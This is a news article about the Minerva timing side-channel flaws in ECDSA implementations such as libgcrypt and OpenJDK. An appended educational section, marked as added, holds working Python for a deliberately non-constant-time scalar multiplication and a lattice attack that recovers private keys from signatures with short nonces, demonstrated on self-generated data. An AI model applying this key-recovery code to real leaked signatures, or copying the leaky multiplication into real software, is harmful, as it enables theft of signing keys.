New Side-Channel Attack Technique for Recovering ECDSA Keys

Researchers from Masaryk University have disclosed vulnerabilities in several implementations of the ECDSA/EdDSA digital signature algorithm. They allow the private key to be recovered from leaks of information about individual bits of the secret nonce, observed with side-channel analysis methods such as timing measurement. The vulnerabilities were given the code name Minerva.

The best-known projects affected by the proposed attack are OpenJDK/OracleJDK (CVE-2019-2894) and the libgcrypt library (CVE-2019-13627) used in GnuPG. MatrixSSL, Crypto++, wolfCrypt, elliptic, jsrsasign, python-ecdsa, ruby_ecdsa, fastecdsa, easy-ecc and Athena IDProtect smart cards are also affected. The Valid S/A IDflex V, SafeNet eToken 4300 and TecSec Armored Card cards, which use the same ECDSA module, have not been tested but are also declared potentially vulnerable.

The problem has already been fixed in the libgcrypt 1.8.5 and wolfCrypt 4.1.0 releases; the remaining projects have not yet published updates. Fixes for the vulnerability in the libgcrypt package of the distributions can be tracked on these pages: Debian, Ubuntu, RHEL, Fedora, openSUSE/SUSE, FreeBSD, Arch.

The vulnerability does not affect OpenSSL, Botan, mbedTLS and BoringSSL. Not yet tested: Mozilla NSS, LibreSSL, Nettle, BearSSL, cryptlib, OpenSSL in FIPS mode, Microsoft .NET crypto, libkcapi from the Linux kernel, libsodium and GnuTLS.

The problem is caused by the scalar multiplication in the elliptic-curve operations not running in constant time: its running time depends on the bit length of the secret nonce, so the number of leading zero bits of the nonce can be determined. Indirect methods, such as measuring the execution time of the computation, are used to extract this bit information. The attack requires unprivileged access to the host on which the digital signature is generated (a remote attack is not ruled out, but it is very complex and requires a large amount of data for analysis, so it can be considered unlikely). The tools used for the attack are available for download.

Despite the negligible size of the leak, for ECDSA learning even a few bits of information about the per-signature nonce is enough to carry out an attack that recovers the entire private key step by step (the nonces with a known short bit length give a hidden-number-problem instance that is solved with lattice reduction). According to the authors of the method, successful key recovery requires the analysis of several hundred to several thousand digital signatures generated over messages known to the attacker. For example, 90 thousand digital signatures over the secp256r1 elliptic curve were analyzed to determine the private key used in an Athena IDProtect smart card based on the Inside Secure AT11SC chip. The total attack time was 30 minutes.
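As an added illustration, not part of the original article or of the Minerva tooling, the following Python model ties the two preceding paragraphs together on P-256 (secp256r1), the curve used in the smart-card example above. It implements textbook ECDSA with a double-and-add scalar multiplication whose loop count equals the nonce's bit length (the class of leak just described), then recovers the private key from a handful of signatures with a hidden-number-problem lattice reduced by a small textbook LLL. To keep the pure-Python LLL fast, the nonces are generated directly with 80 known leading zero bits instead of being selected from timing measurements; the real attack works with a leak of a few bits, hundreds to thousands of signatures and a proper lattice library, but the lattice shape is the same. Function names, the `leading_zero_bits`/`num_sigs` parameters and the signed messages are this example's own constructions.

```python
import hashlib
import secrets
from fractions import Fraction

# NIST P-256 (secp256r1) parameters; affine points, None is the point at infinity.
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
BITS = 256

def ec_add(p1, p2):
    if p1 is None: return p2
    if p2 is None: return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None                                   # Q + (-Q)
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)

def scalar_mult(k, pt):
    """Double-and-add: one iteration per bit of k, so run time reveals
    k.bit_length(). A constant-time ladder would always process BITS bits."""
    acc = None
    for bit in bin(k)[2:]:
        acc = ec_add(acc, acc)
        if bit == "1":
            acc = ec_add(acc, pt)
    return acc

def ecdsa_sign(d, msg, k):
    """Textbook ECDSA with a caller-chosen nonce k. Returns (h, r, s)."""
    h = int.from_bytes(hashlib.sha256(msg).digest(), "big") % N
    r = scalar_mult(k, G)[0] % N
    return h, r, pow(k, -1, N) * (h + r * d) % N

def lll(basis, delta=Fraction(3, 4)):
    """Textbook LLL over Fractions; fine for the ~8-dimensional lattice here."""
    b = [[Fraction(x) for x in row] for row in basis]
    n = len(b)
    bs, mu = [], [[Fraction(0)] * n for _ in range(n)]
    dot = lambda u, v: sum(x * y for x, y in zip(u, v))
    def gram_schmidt(start=0):          # rows before `start` are unchanged
        del bs[start:]
        for i in range(start, n):
            v = b[i][:]
            for j in range(i):
                mu[i][j] = dot(b[i], bs[j]) / dot(bs[j], bs[j])
                v = [x - mu[i][j] * y for x, y in zip(v, bs[j])]
            bs.append(v)
    gram_schmidt()
    k = 1
    while k < n:
        for j in range(k - 1, -1, -1):                # size-reduce b[k]
            q = round(mu[k][j])
            if q:
                b[k] = [x - q * y for x, y in zip(b[k], b[j])]
                mu[k][j] -= q
                for i in range(j):
                    mu[k][i] -= q * mu[j][i]
        if dot(bs[k], bs[k]) >= (delta - mu[k][k - 1] ** 2) * dot(bs[k - 1], bs[k - 1]):
            k += 1                                    # Lovasz condition holds
        else:
            b[k], b[k - 1] = b[k - 1], b[k]
            gram_schmidt(k - 1)
            k = max(k - 1, 1)
    return b

def recover_key(sigs, leading_zero_bits, pub):
    """sigs: (h, r, s) whose nonces satisfy k < K = 2**(BITS - leading_zero_bits).
    s*k = h + r*d gives k_i = u_i + t_i*d (mod N) with k_i small. Basis rows:
    N*e_i; T = (t_1..t_m, K/N, 0); U = (u_1..u_m, 0, K). The lattice vector
    d*T + U - sum(c_i*N*e_i) = (k_1..k_m, d*K/N, K) is unusually short."""
    m = len(sigs)
    K = 1 << (BITS - leading_zero_bits)
    t = [pow(s, -1, N) * r % N for _, r, s in sigs]
    u = [pow(s, -1, N) * h % N for h, _, s in sigs]
    basis = [[N if i == j else 0 for j in range(m + 2)] for i in range(m)]
    basis.append(t + [Fraction(K, N), 0])
    basis.append(u + [0, K])
    for row in lll(basis):
        j = int(row[-1] / K)            # any lattice vector is j*U + a*T + ...
        if j == 0:
            continue
        a = int(row[-2] * N / K)        # = j*d + (multiple of N)
        d = a * pow(j % N, -1, N) % N
        if scalar_mult(d, G) == pub:    # confirm against the public key
            return d
    return None

def demo(num_sigs=6, leading_zero_bits=80):
    """Constructed data: sign with nonces having leading_zero_bits zero bits at
    the top (the signatures a timing filter would select), then recover d.
    80 bits per nonce is far more than the real attack needs; it keeps this
    pure-Python LLL at dimension num_sigs + 2."""
    d = secrets.randbelow(N - 1) + 1
    pub = scalar_mult(d, G)
    sigs = []
    for i in range(num_sigs):
        k = secrets.randbelow((1 << (BITS - leading_zero_bits)) - 1) + 1
        sigs.append(ecdsa_sign(d, b"constructed message %d" % i, k))
    return recover_key(sigs, leading_zero_bits, pub) == d
```

Running `demo()` returns `True` when the lattice yields the signing key. The row check in `recover_key` does not assume the short vector appears as exactly one basis row: any reduced row with a nonzero last coordinate `j*K` encodes `j*d` modulo N, so the candidate is unscaled by `j` and confirmed against the public key before it is accepted.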

Source: opennet.ru
